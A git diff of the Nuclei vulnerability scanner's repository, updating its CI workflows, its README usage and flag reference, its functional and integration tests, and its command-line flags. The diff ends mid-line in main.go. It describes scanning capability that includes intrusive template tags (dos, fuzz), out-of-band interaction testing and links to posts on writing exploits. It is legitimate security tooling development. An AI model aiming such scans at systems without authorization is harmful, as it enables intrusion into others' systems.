diff --git a/.github/dependabot.yml b/.github/dependabot.yml index 4d5617f29d..69d95437c9 100644 --- a/.github/dependabot.yml +++ b/.github/dependabot.yml @@ -11,6 +11,7 @@ updates: directory: "/" schedule: interval: "weekly" + target-branch: "dev" commit-message: prefix: "chore" include: "scope" @@ -20,6 +21,7 @@ updates: directory: "/" schedule: interval: "weekly" + target-branch: "dev" commit-message: prefix: "chore" include: "scope" @@ -29,6 +31,7 @@ updates: directory: "/" schedule: interval: "weekly" + target-branch: "dev" commit-message: prefix: "chore" - include: "scope" + include: "scope" \ No newline at end of file diff --git a/.github/workflows/build-test.yml b/.github/workflows/build-test.yml new file mode 100644 index 0000000000..ddf318bea6 --- /dev/null +++ b/.github/workflows/build-test.yml @@ -0,0 +1,31 @@ +name: 🔨 Build Test +on: + push: + pull_request: + workflow_dispatch: + + +jobs: + build: + name: Test Builds + runs-on: ubuntu-latest + steps: + - name: Set up Go + uses: actions/setup-go@v2 + with: + go-version: 1.15 + + - name: Check out code + uses: actions/checkout@v2 + + - name: Test + run: go test ./... + working-directory: v2/ + + - name: Integration Tests + run: bash run.sh + working-directory: integration_tests/ + + - name: Build + run: go build . + working-directory: v2/cmd/nuclei/ \ No newline at end of file diff --git a/.github/workflows/build.yaml b/.github/workflows/build.yaml deleted file mode 100644 index 2020dd10a3..0000000000 --- a/.github/workflows/build.yaml +++ /dev/null @@ -1,45 +0,0 @@ -name: Build -on: - push: - branches: - - master - pull_request: - -jobs: - lint: - name: golangci-lint - runs-on: ubuntu-latest - steps: - - name: Checkout code - uses: actions/checkout@v2 - - name: Run golangci-lint - uses: golangci/golangci-lint-action@v2.5.2 - with: - # Required: the version of golangci-lint is required and must be specified without patch version: we always use the latest patch version. - version: v1.33 - args: --timeout 5m - working-directory: v2/ - - build: - name: Build - runs-on: ubuntu-latest - steps: - - name: Set up Go - uses: actions/setup-go@v2 - with: - go-version: 1.15 - - - name: Check out code - uses: actions/checkout@v2 - - - name: Test - run: go test ./... - working-directory: v2/ - - - name: Integration Tests - run: bash run.sh - working-directory: integration_tests/ - - - name: Build - run: go build . - working-directory: v2/cmd/nuclei/ diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml new file mode 100644 index 0000000000..545cdea93a --- /dev/null +++ b/.github/workflows/codeql-analysis.yml @@ -0,0 +1,38 @@ +name: 🚨 CodeQL Analysis + +on: + workflow_dispatch: + pull_request: + branches: + - dev + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: [ 'go' ] + # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ] + + steps: + - name: Checkout repository + uses: actions/checkout@v2 + + # Initializes the CodeQL tools for scanning. 
+ - name: Initialize CodeQL + uses: github/codeql-action/init@v1 + with: + languages: ${{ matrix.language }} + + - name: Autobuild + uses: github/codeql-action/autobuild@v1 + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v1 \ No newline at end of file diff --git a/.github/workflows/dockerhub-push.yml b/.github/workflows/dockerhub-push.yml index 8a93961a50..f201dc1b88 100644 --- a/.github/workflows/dockerhub-push.yml +++ b/.github/workflows/dockerhub-push.yml @@ -1,19 +1,34 @@ -# dockerhub-push pushes docker build to dockerhub automatically -# on the creation of a new release -name: Publish to Dockerhub on creation of a new release -on: +name: 🌥 Docker Push + +on: release: types: [published] + workflow_dispatch: + jobs: - update: + docker: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master - - name: Publish to Dockerhub Registry - #pre: echo ::save-state name=RELEASE_VERSION::$(echo ${GITHUB_REF:10}) - uses: elgohr/Publish-Docker-Github-Action@master - with: - name: projectdiscovery/nuclei - username: ${{ secrets.DOCKER_USERNAME }} - password: ${{ secrets.DOCKER_PASSWORD }} - tags: "latest" #"latest,${{ env.STATE_RELEASE_VERSION }}" + - + name: Checkout + uses: actions/checkout@v2 + - + name: Set up QEMU + uses: docker/setup-qemu-action@v1 + - + name: Set up Docker Buildx + uses: docker/setup-buildx-action@v1 + - + name: Login to DockerHub + uses: docker/login-action@v1 + with: + username: ${{ secrets.DOCKER_USERNAME }} + password: ${{ secrets.DOCKER_TOKEN }} + - + name: Build and push + uses: docker/build-push-action@v2 + with: + context: . + platforms: linux/amd64,linux/arm64,linux/arm + push: true + tags: projectdiscovery/nuclei:latest \ No newline at end of file diff --git a/.github/workflows/functional-test.yml b/.github/workflows/functional-test.yml new file mode 100644 index 0000000000..de2a43c931 --- /dev/null +++ b/.github/workflows/functional-test.yml @@ -0,0 +1,25 @@ +name: 🧪 Functional Test +on: + push: + pull_request: + workflow_dispatch: + + +jobs: + build: + name: Functional Test + runs-on: ubuntu-latest + steps: + - name: Set up Go + uses: actions/setup-go@v2 + with: + go-version: 1.15 + + - name: Check out code + uses: actions/checkout@v2 + + - name: Functional Tests + run: | + chmod +x run.sh + bash run.sh + working-directory: v2/cmd/functional-test \ No newline at end of file diff --git a/.github/workflows/lint-test.yml b/.github/workflows/lint-test.yml new file mode 100644 index 0000000000..ad6dd61166 --- /dev/null +++ b/.github/workflows/lint-test.yml @@ -0,0 +1,19 @@ +name: 🙏🏻 Lint Test +on: + push: + pull_request: + workflow_dispatch: + +jobs: + lint: + name: Lint Test + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v2 + - name: Run golangci-lint + uses: golangci/golangci-lint-action@v2 + with: + version: latest + args: --timeout 5m + working-directory: v2/ \ No newline at end of file diff --git a/.github/workflows/release.yml b/.github/workflows/release-binary.yml similarity index 84% rename from .github/workflows/release.yml rename to .github/workflows/release-binary.yml index 822994122c..7bc3cc13c3 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release-binary.yml @@ -1,8 +1,9 @@ -name: Release +name: 🎉 Release Binary on: create: tags: - v* + workflow_dispatch: jobs: release: @@ -17,7 +18,7 @@ jobs: name: "Set up Go" uses: actions/setup-go@v2 with: - go-version: 1.15 + go-version: 1.16 - env: GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" @@ -26,5 +27,4 @@ jobs: with: args: 
"release --rm-dist" version: latest - workdir: v2/ - \ No newline at end of file + workdir: v2/ \ No newline at end of file diff --git a/.gitignore b/.gitignore index 10f5c008e3..e812e00d2b 100644 --- a/.gitignore +++ b/.gitignore @@ -3,4 +3,11 @@ v2/cmd/nuclei/nuclei .idea integration_tests/integration-test integration_tests/nuclei -v2/cmd/integration-test/integration-test \ No newline at end of file +v2/cmd/integration-test/integration-test +bin +v2/pkg/protocols/common/helpers/deserialization/testdata/Deserialize.class +v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject.class +v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject2.ser +v2/cmd/functional-test/nuclei_dev +v2/cmd/functional-test/nuclei_main +v2/cmd/functional-test/functional-test \ No newline at end of file diff --git a/.golangci.yml b/.golangci.yml index 6c88a19f1b..9a2621ab41 100644 --- a/.golangci.yml +++ b/.golangci.yml @@ -66,7 +66,6 @@ linters: - gocritic - gofmt - goimports - - golint #- gomnd - goprintffuncname - gosimple @@ -89,6 +88,7 @@ linters: - unused - varcheck - whitespace + - revive # don't enable: # - depguard @@ -105,11 +105,4 @@ linters: # - nestif # - prealloc # - testpackage - # - wsl - -# golangci.com configuration -# https://github.com/golangci/golangci/wiki/Configuration -service: - golangci-lint-version: 1.33.x # use the fixed version to not introduce new linters unexpectedly - prepare: - - echo "here I can run custom commands, but no preparation needed for this repo" + # - wsl \ No newline at end of file diff --git a/Dockerfile b/Dockerfile index 6dda403a98..d915a432ea 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15-alpine as build-env +FROM golang:1.16.6-alpine as build-env RUN GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei FROM alpine:latest diff --git a/README.md b/README.md index 49cfb9fda9..53bb5e800f 100644 --- a/README.md +++ b/README.md @@ -11,8 +11,8 @@ - - + +

@@ -45,33 +45,152 @@ We have a [dedicated repository](https://github.com/projectdiscovery/nuclei-temp # Install Nuclei ```sh -▶ GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei +GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei ``` -**More installation [methods can be found here](https://nuclei.projectdiscovery.io/nuclei/get-started/#nuclei-installation).** +**More installation [methods can be found here](https://nuclei.projectdiscovery.io/nuclei/get-started/).**
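A quick sanity check after installing might look like the following (a minimal sketch; `-version` and `-update-templates` are the flags documented in the usage reference further below, and `$HOME/nuclei-templates` is the documented default template directory):

```sh
# print the installed nuclei version
nuclei -version

# download or refresh the community templates into the default directory
nuclei -update-templates
```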
-### Download Templates +### Nuclei Templates -You can download and update the nuclei templates using *update-templates* flag of nuclei that downloads all the available **nuclei-templates** from [Github project](https://github.com/projectdiscovery/nuclei-templates), a community curated list of templates that are ready to use. +Nuclei has had built-in support for automatic update/download templates since version [v2.4.0](https://github.com/projectdiscovery/nuclei/releases/tag/v2.4.0). [**Nuclei-Templates**](https://github.com/projectdiscovery/nuclei-templates) project provides a community-contributed list of ready-to-use templates that is constantly updated. -`▶ nuclei -update-templates` - -Nuclei is designed to used with custom templates according to the target and workflow, you can write your own checks for your specific workflow and needs, please refer to nuclei [templating guide](https://nuclei.projectdiscovery.io/templating-guide/) to write your own custom templates. +You may still use the `update-templates` flag to update the nuclei templates at any time; automatic updates happen every 24 hours. You can write your own checks for your individual workflow and needs following Nuclei's [templating guide](https://nuclei.projectdiscovery.io/templating-guide/).
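Custom templates are plain YAML files passed with `-t`, so a typical local loop might look like this (a sketch; `my-template.yaml` is a hypothetical placeholder for your own check, while `-validate`, `-t` and `-u` are the flags described in the usage reference below):

```sh
# confirm the custom template parses cleanly before scanning with it
nuclei -validate -t my-template.yaml

# run only that template against a single target
nuclei -u https://example.com -t my-template.yaml
```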
+### Usage + +```sh +nuclei -h +``` + +This will display help for the tool. Here are all the switches it supports. + + +```yaml +Nuclei is a fast, template based vulnerability scanner focusing +on extensive configurability, massive extensibility and ease of use. + +Usage: + ./nuclei [flags] + +Flags: +TARGET: + -u, -target string[] target URLs/hosts to scan + -l, -list string path to file containing a list of target URLs/hosts to scan (one per line) + +TEMPLATES: + -tl list all available templates + -t, -templates string[] template or template directory paths to include in the scan + -w, -workflows string[] list of workflows to run + -nt, -new-templates run newly added templates only + -validate validate the passed templates to nuclei + +FILTERING: + -tags string[] execute a subset of templates that contain the provided tags + -include-tags string[] tags from the default deny list that permit executing more intrusive templates + -etags, -exclude-tags string[] exclude templates with the provided tags + -include-templates string[] templates to be executed even if they are excluded either by default or configuration + -exclude-templates, -exclude string[] template or template directory paths to exclude + -severity, -impact string[] execute templates that match the provided severities only + -author string[] execute templates that are (co-)created by the specified authors + +OUTPUT: + -o, -output string output file to write found issues/vulnerabilities + -silent display findings only + -v, -verbose show verbose output + -vv display extra verbose information + -nc, -no-color disable output content coloring (ANSI escape codes) + -json write output in JSONL(ines) format + -irr, -include-rr include request/response pairs in the JSONL output (for findings only) + -nm, -no-meta don't display match metadata + -rdb, -report-db string local nuclei reporting database (always use this to persist report data) + -me, -markdown-export string directory to export results in markdown format + -se, -sarif-export string file to export results in SARIF format + +CONFIGURATIONS: + -config string path to the nuclei configuration file + -rc, -report-config string nuclei reporting module configuration file + -H, -header string[] custom headers in header:value format + -r, -resolvers string file containing resolver list for nuclei + -system-resolvers use system DNS resolving as error fallback + -passive enable passive HTTP response processing mode + +INTERACTSH: + -no-interactsh do not use interactsh server for blind interaction polling + -interactsh-url string self-hosted Interactsh Server URL (default "https://interact.sh") + -interactions-cache-size int number of requests to keep in the interactions cache (default 5000) + -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60) + -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5) + -interactions-cooldown-period int extra time for interaction polling before exiting (default 5) + +RATE-LIMIT: + -rl, -rate-limit int maximum number of requests to send per second (default 150) + -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25) + -c, -concurrency int maximum number of templates to be executed in parallel (default 10) + +OPTIMIZATIONS: + -timeout int time to wait in seconds before timeout (default 5) + -retries int number of times to retry a failed request (default 1) + -project use a project folder to avoid sending same 
request multiple times + -project-path string set a specific project path (default "/var/folders/ml/m31ysb5x73l1s3kjlyn5g4180000gn/T/") + -spm, -stop-at-first-path stop processing HTTP requests after the first match (may break template/workflow logic) + +HEADLESS: + -headless enable templates that require headless browser support + -page-timeout int seconds to wait for each page in headless mode (default 20) + -show-browser show the browser on the screen when running templates with headless mode + +DEBUG: + -debug show all requests and responses + -debug-req show all sent requests + -debug-resp show all received responses + -proxy, -proxy-url string URL of the HTTP proxy server + -proxy-socks-url string URL of the SOCKS proxy server + -trace-log string file to write sent requests trace log + -version show nuclei version + -tv, -templates-version shows the version of the installed nuclei-templates + +UPDATE: + -update update nuclei to the latest released version + -ut, -update-templates update the community templates to latest released version + -ud, -update-directory string overwrite the default nuclei-templates directory (default "$HOME/nuclei-templates") + +STATISTICS: + -stats display statistics about the running scan + -stats-json write statistics data to an output file in JSONL(ines) format + -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5) + -metrics expose nuclei metrics on a port + -metrics-port int port to expose nuclei metrics on (default 9092) +``` + ### Running Nuclei -Scanning for CVEs on given list of URLs. +Scanning target domain with [community-curated](https://github.com/projectdiscovery/nuclei-templates) nuclei templates. ```sh -▶ nuclei -l target_urls.txt -t cves/ +nuclei -u https://example.com +``` + +Scanning target URLs with [community-curated](https://github.com/projectdiscovery/nuclei-templates) nuclei templates. + +```sh +nuclei -list urls.txt +``` + +Example of `urls.txt`: + +```yaml +http://example.com +http://app.example.com +http://test.example.com +http://uat.example.com ``` **More detailed examples of running nuclei can be found [here](https://nuclei.projectdiscovery.io/nuclei/get-started/#running-nuclei).** @@ -94,7 +213,7 @@ Nuclei offers great number of features that are helpful for security engineers t **For bugbounty hunters:** -Nuclei allows you to customise your testing approach with your own suite of checks and easily run across your bug bounty programs. Moroever, Nuclei can be easily integrated into any continuous scanning workflow. +Nuclei allows you to customise your testing approach with your own suite of checks and easily run across your bug bounty programs. Moreover, Nuclei can be easily integrated into any continuous scanning workflow. - Designed to be easily integrated into other tool workflow. - Can process thousands of hosts in few minutes. 
@@ -147,8 +266,10 @@ We have [a discussion thread around this](https://github.com/projectdiscovery/nu - [Community Powered Scanning with Nuclei](https://blog.projectdiscovery.io/community-powered-scanning-with-nuclei/) - [Nuclei Unleashed - Quickly write complex exploits](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/) - [Nuclei - Fuzz all the things](https://blog.projectdiscovery.io/nuclei-fuzz-all-the-things/) +- [Nuclei + Interactsh Integration for Automating OOB Testing](https://blog.projectdiscovery.io/nuclei-interactsh-integration/) - [Weaponizes nuclei Workflows to Pwn All the Things](https://medium.com/@dwisiswant0/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77) by [@dwisiswant0](https://github.com/dwisiswant0) - [How to Scan Continuously with Nuclei?](https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9) by [@dwisiswant0](https://github.com/dwisiswant0) +- [Hack with Automation !!!](https://dhiyaneshgeek.github.io/web/security/2021/07/19/hack-with-automation/) by [@DhiyaneshGeek](https://github.com/DhiyaneshGeek) ### Credits @@ -161,5 +282,5 @@ Thanks to all the amazing community [contributors for sending PRs](https://githu Nuclei is distributed under [MIT License](https://github.com/projectdiscovery/nuclei/blob/master/LICENSE.md)

- Join Discord Check Nuclei Documentation + Join Discord Check Nuclei Documentation

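Putting the target, filtering, and output flags from the usage reference together, a combined run might look like this (a sketch; `urls.txt` and `results.txt` are placeholder file names, and every flag shown appears in the flag reference above):

```sh
# scan a list of hosts with CVE-tagged templates of high/critical severity
# and write the findings to a file
nuclei -list urls.txt -tags cve -severity critical,high -o results.txt
```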
diff --git a/README_CN.md b/README_CN.md index f89fe5c985..04138acd21 100644 --- a/README_CN.md +++ b/README_CN.md @@ -97,7 +97,7 @@ nuclei -h |burp-collaborator-biid|使用burp-collaborator插件|nuclei -burp-collaborator-biid XXXX| |c|并行的最大模板数量(默认10)|nuclei -c 10| |l|对URL列表进行测试|nuclei -l urls.txt| -|target|对目标进行测试|nuclei -target hxxps://example.com| +|target|对目标进行测试|nuclei -target hxxps://example.com -target hxxps://example2.com| |t|要检测的模板种类|nuclei -t git-core.yaml -t cves/| |no-color|输出不显示颜色|nuclei -no-color| |no-meta|不显示匹配的元数据|nuclei -no-meta| @@ -250,4 +250,4 @@ nano ~/nuclei-templates/.nuclei-ignore -------- -Nuclei是由[projectdiscovery](https://projectdiscovery.io)团队用🖤制作的,当然社区也贡献了很多,通过 **[Thanks.md](https://github.com/projectdiscovery/nuclei/blob/master/THANKS.md)**文件以获取更多详细信息。 \ No newline at end of file +Nuclei是由[projectdiscovery](https://projectdiscovery.io)团队用🖤制作的,当然社区也贡献了很多,通过 **[Thanks.md](https://github.com/projectdiscovery/nuclei/blob/master/THANKS.md)**文件以获取更多详细信息。 diff --git a/SECURITY.md b/SECURITY.md new file mode 100644 index 0000000000..fc8033f4fa --- /dev/null +++ b/SECURITY.md @@ -0,0 +1,5 @@ +# Security Policy + +## Reporting a Vulnerability + +DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to security@projectdiscovery.io and we will acknowledge it within 3 working days. diff --git a/integration_tests/http/raw-unsafe-request.yaml b/integration_tests/http/raw-unsafe-request.yaml index 8a5739845a..0a84b91570 100644 --- a/integration_tests/http/raw-unsafe-request.yaml +++ b/integration_tests/http/raw-unsafe-request.yaml @@ -17,4 +17,4 @@ requests: matchers: - type: word words: - - "This is test-raw-unsafe request matcher." \ No newline at end of file + - "This is test raw-unsafe-matcher test" \ No newline at end of file diff --git a/integration_tests/run.sh b/integration_tests/run.sh index ed7afe5aa9..507f6f7ef9 100644 --- a/integration_tests/run.sh +++ b/integration_tests/run.sh @@ -2,10 +2,10 @@ cd ../v2/cmd/nuclei go build -cp nuclei ../../../integration_tests/nuclei +mv nuclei ../../../integration_tests/nuclei cd ../integration-test go build -cp integration-test ../../../integration_tests/integration-test +mv integration-test ../../../integration_tests/integration-test cd ../../../integration_tests ./integration-test if [ $? 
-eq 0 ] diff --git a/v2/.goreleaser.yml b/v2/.goreleaser.yml index f88edccdcc..e97cfc12a8 100644 --- a/v2/.goreleaser.yml +++ b/v2/.goreleaser.yml @@ -3,23 +3,31 @@ before: - go mod tidy builds: - - binary: nuclei - main: cmd/nuclei/main.go - goos: - - linux - - windows - - darwin - goarch: - - amd64 - - 386 - - arm - - arm64 - +- env: + - CGO_ENABLED=0 + goos: + - windows + - linux + - darwin + goarch: + - amd64 + - 386 + - arm + - arm64 + + ignore: + - goos: darwin + goarch: '386' + - goos: windows + goarch: 'arm' + + binary: '{{ .ProjectName }}' + main: cmd/nuclei/main.go + archives: - - id: tgz - format: tar.gz - replacements: - darwin: macOS - format_overrides: - - goos: windows - format: zip +- format: zip + replacements: + darwin: macOS + +checksum: + algorithm: sha256 \ No newline at end of file diff --git a/v2/cmd/functional-test/main.go b/v2/cmd/functional-test/main.go new file mode 100644 index 0000000000..1e54cda7e1 --- /dev/null +++ b/v2/cmd/functional-test/main.go @@ -0,0 +1,79 @@ +package main + +import ( + "bufio" + "flag" + "fmt" + "log" + "os" + "strings" + + "github.com/logrusorgru/aurora" + "github.com/pkg/errors" + "github.com/projectdiscovery/nuclei/v2/internal/testutils" +) + +var ( + success = aurora.Green("[✓]").String() + failed = aurora.Red("[✘]").String() + errored = false + + mainNucleiBinary = flag.String("main", "", "Main Branch Nuclei Binary") + devNucleiBinary = flag.String("dev", "", "Dev Branch Nuclei Binary") + testcases = flag.String("testcases", "", "Test cases file for nuclei functional tests") +) + +func main() { + flag.Parse() + + if err := runFunctionalTests(); err != nil { + log.Fatalf("Could not run functional tests: %s\n", err) + } + if errored { + os.Exit(1) + } +} + +func runFunctionalTests() error { + file, err := os.Open(*testcases) + if err != nil { + return errors.Wrap(err, "could not open test cases") + } + defer file.Close() + + scanner := bufio.NewScanner(file) + for scanner.Scan() { + text := strings.TrimSpace(scanner.Text()) + if text == "" { + continue + } + if err := runIndividualTestCase(text); err != nil { + errored = true + fmt.Fprintf(os.Stderr, "%s Test \"%s\" failed: %s\n", failed, text, err) + } else { + fmt.Printf("%s Test \"%s\" passed!\n", success, text) + } + } + return nil +} + +func runIndividualTestCase(testcase string) error { + parts := strings.Fields(testcase) + + var finalArgs []string + if len(parts) > 1 { + finalArgs = parts[1:] + } + mainOutput, err := testutils.RunNucleiBinaryAndGetLoadedTemplates(*mainNucleiBinary, finalArgs) + if err != nil { + return errors.Wrap(err, "could not run nuclei main test") + } + devOutput, err := testutils.RunNucleiBinaryAndGetLoadedTemplates(*devNucleiBinary, finalArgs) + if err != nil { + return errors.Wrap(err, "could not run nuclei dev test") + } + if mainOutput == devOutput { + return nil + } + return fmt.Errorf("%s main is not equal to %s dev", mainOutput, devOutput) +} diff --git a/v2/cmd/functional-test/run.sh b/v2/cmd/functional-test/run.sh new file mode 100644 index 0000000000..030b25443f --- /dev/null +++ b/v2/cmd/functional-test/run.sh @@ -0,0 +1,13 @@ +#!/bin/bash + +echo 'Building functional-test binary' +go build + +echo 'Building Nuclei binary from current branch' +go build -o nuclei_dev ../nuclei + +echo 'Installing latest release of nuclei' +GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei + +echo 'Starting Nuclei functional test' +./functional-test -main nuclei -dev ./nuclei_dev -testcases testcases.txt \ No newline at end of file diff 
--git a/v2/cmd/functional-test/testcases.txt b/v2/cmd/functional-test/testcases.txt new file mode 100644 index 0000000000..18bfd326a1 --- /dev/null +++ b/v2/cmd/functional-test/testcases.txt @@ -0,0 +1,51 @@ +{{binary}} +{{binary}} -tags cve +{{binary}} -tags cve,exposure +{{binary}} -tags cve,exposure -tags token +{{binary}} -tags cve,exposure -tags token,logs +{{binary}} -tags "cve","exposure" -tags "token","logs" +{{binary}} -tags 'cve','exposure' -tags 'token','logs' +{{binary}} -tags cve -severity high +{{binary}} -tags cve,exposure -severity high,critical +{{binary}} -tags cve,exposure -severity "high,critical,medium" +{{binary}} -tags cve -author geeknik +{{binary}} -tags cve -author geeknik,pdteam +{{binary}} -tags cve -author geeknik -severity high +{{binary}} -tags cve +{{binary}} -tags cve,exposure +{{binary}} -tags cve,exposure -tags token +{{binary}} -tags cve,exposure -tags token,logs +{{binary}} -tags "cve","exposure" -tags "token","logs" +{{binary}} -tags 'cve','exposure' -tags 'token','logs' +{{binary}} -tags cve -severity high +{{binary}} -tags cve,exposure -severity high,critical +{{binary}} -tags cve,exposure -severity "high,critical,medium" +{{binary}} -tags cve -author geeknik +{{binary}} -tags cve -author geeknik,pdteam +{{binary}} -tags cve -author geeknik -severity high +{{binary}} -tags cve,exposure -author geeknik,pdteam -severity high,critical +{{binary}} -tags "cve,exposure" -author "geeknik,pdteam" -severity "high,critical" +{{binary}} -tags cve -etags ssrf +{{binary}} -tags cve,exposure -etags ssrf,config +{{binary}} -tags cve,exposure -etags ssrf,config -severity high +{{binary}} -tags cve,exposure -etags ssrf,config -severity high -author geeknik +{{binary}} -tags cve,dos,fuzz +{{binary}} -tags cve -include-tags dos,fuzz +{{binary}} -tags cve -exclude-tags cve2020 +{{binary}} -tags cve -exclude-templates cves/2020/ +{{binary}} -tags cve -exclude-templates cves/2020/CVE-2020-9757.yaml +{{binary}} -tags cve -exclude-templates cves/2020/CVE-2020-9757.yaml -exclude-templates cves/2021/ +{{binary}} -t cves/ +{{binary}} -t cves/ -t exposures/ +{{binary}} -t cves/ -t exposures/ -tags config +{{binary}} -t cves/ -t exposures/ -tags config,ssrf +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam -etags sqli +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam -etags sqli -exclude-templates cves/2021/ +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam -etags sqli -exclude-templates cves/2017/CVE-2017-7269.yaml +{{binary}} -t cves/ -t exposures/ -tags config -severity high,critical -author geeknik,pdteam -etags sqli -include-templates cves/2017/CVE-2017-7269.yaml +{{binary}} -w workflows +{{binary}} -w workflows -author geeknik,pdteam +{{binary}} -w workflows -severity high,critical +{{binary}} -w workflows -author geeknik,pdteam -severity high,critical \ No newline at end of file diff --git a/v2/cmd/integration-test/http.go b/v2/cmd/integration-test/http.go index 9a078d8f1f..e23d740b2b 100644 --- a/v2/cmd/integration-test/http.go +++ b/v2/cmd/integration-test/http.go @@ -474,8 +474,7 @@ func (h *httpRawUnsafeRequest) Execute(filePath string) error { ts := testutils.NewTCPServer(func(conn net.Conn) { defer conn.Close() - - _, _ = conn.Write([]byte("HTTP/1.1 200 
OK\r\nConnection: close\r\nContent-Length: 40\r\nContent-Type: text/plain; charset=utf-8\r\nDate: Thu, 25 Feb 2021 17:17:28 GMT\r\n\r\nThis is test-raw-unsafe request matcher.\r\n")) + _, _ = conn.Write([]byte("HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 36\r\nContent-Type: text/plain; charset=utf-8\r\n\r\nThis is test raw-unsafe-matcher test")) }) defer ts.Close() diff --git a/v2/cmd/integration-test/integration-test.go b/v2/cmd/integration-test/integration-test.go index 6b9e161c92..ad416b5c4e 100644 --- a/v2/cmd/integration-test/integration-test.go +++ b/v2/cmd/integration-test/integration-test.go @@ -13,6 +13,8 @@ var ( debug = os.Getenv("DEBUG") == "true" customTest = os.Getenv("TEST") protocol = os.Getenv("PROTO") + + errored = false ) func main() { @@ -36,13 +38,16 @@ func main() { err := test.Execute(file) if err != nil { fmt.Fprintf(os.Stderr, "%s Test \"%s\" failed: %s\n", failed, file, err) - os.Exit(1) + errored = true } else { fmt.Printf("%s Test \"%s\" passed!\n", success, file) } } } } + if errored { + os.Exit(1) + } } func errIncorrectResultsCount(results []string) error { diff --git a/v2/cmd/nuclei/issue-tracker-config.yaml b/v2/cmd/nuclei/issue-tracker-config.yaml index f69342c79c..3fffce4972 100644 --- a/v2/cmd/nuclei/issue-tracker-config.yaml +++ b/v2/cmd/nuclei/issue-tracker-config.yaml @@ -32,14 +32,16 @@ # issue-label: "" # jira contains configuration options for jira issue tracker -#jira: +#jira: +# # Cloud is the boolean which tells if Jira instance is running in the cloud or on-prem version is used +# cloud: true # # URL is the jira application url # url: "" -# # account-id is the account-id of the jira user +# # account-id is the account-id of the jira user or username in case of on-prem Jira # account-id: "" # # email is the email of the user for jira instance # email: "" -# # token is the token for jira instance. +# # token is the token for jira instance or password in case of on-prem Jira # token: "" # # project-name is the name of the project. 
# project-name: "" diff --git a/v2/cmd/nuclei/main.go b/v2/cmd/nuclei/main.go index afc48fc8df..2934955d05 100644 --- a/v2/cmd/nuclei/main.go +++ b/v2/cmd/nuclei/main.go @@ -24,79 +24,158 @@ func main() { if err != nil { gologger.Fatal().Msgf("Could not create runner: %s\n", err) } - nucleiRunner.RunEnumeration() + if nucleiRunner == nil { + return + } + if err := nucleiRunner.RunEnumeration(); err != nil { + gologger.Fatal().Msgf("Could not run nuclei: %s\n", err) + } + nucleiRunner.Close() } func readConfig() { home, _ := os.UserHomeDir() templatesDirectory := filepath.Join(home, "nuclei-templates") - set := goflags.New() - set.SetDescription(`Nuclei is a fast tool for configurable targeted scanning -based on templates offering massive extensibility and ease of use.`) - set.StringVar(&cfgFile, "config", "", "Nuclei configuration file") - set.BoolVar(&options.Metrics, "metrics", false, "Expose nuclei metrics on a port") - set.IntVar(&options.MetricsPort, "metrics-port", 9092, "Port to expose nuclei metrics on") - set.StringVarP(&options.Target, "target", "u", "", "URL to scan with nuclei") - set.StringSliceVarP(&options.Templates, "templates", "t", []string{}, "Templates to run, supports single and multiple templates using directory.") - set.StringSliceVarP(&options.Workflows, "workflows", "w", []string{}, "Workflows to run for nuclei") - set.StringSliceVarP(&options.AdvancedWorkflows, "advanced-workflows", "wa", []string{}, "Advanced workflows to run for nuclei") - set.StringSliceVarP(&options.ExcludedTemplates, "exclude", "et", []string{}, "Templates to exclude, supports single and multiple templates using directory.") - set.StringSliceVarP(&options.Severity, "severity", "impact", []string{}, "Templates to run based on severity, supports single and multiple severity.") - set.StringVarP(&options.Targets, "list", "l", "", "List of URLs to run templates on") - set.StringVarP(&options.Output, "output", "o", "", "File to write output to (optional)") - set.StringVar(&options.ProxyURL, "proxy-url", "", "URL of the proxy server") - set.StringVar(&options.ProxySocksURL, "proxy-socks-url", "", "URL of the proxy socks server") - set.BoolVar(&options.Silent, "silent", false, "Show only results in output") - set.BoolVar(&options.Version, "version", false, "Show version of nuclei") - set.BoolVarP(&options.Verbose, "verbose", "v", false, "Show verbose output") - set.BoolVarP(&options.NoColor, "no-color", "nc", false, "Disable colors in output") - set.IntVar(&options.Timeout, "timeout", 5, "Time to wait in seconds before timeout") - set.IntVar(&options.Retries, "retries", 1, "Number of times to retry a failed request") - set.StringSliceVarP(&options.CustomHeaders, "header", "H", []string{}, "Custom Header.") - set.BoolVar(&options.Debug, "debug", false, "Debugging request and responses") - set.BoolVar(&options.DebugRequests, "debug-req", false, "Debugging request") - set.BoolVar(&options.DebugResponse, "debug-resp", false, "Debugging response") - set.BoolVarP(&options.UpdateTemplates, "update-templates", "ut", false, "Download / updates nuclei community templates") - set.StringVar(&options.TraceLogFile, "trace-log", "", "File to write sent requests trace log") - set.StringVarP(&options.TemplatesDirectory, "update-directory", "ud", templatesDirectory, "Directory storing 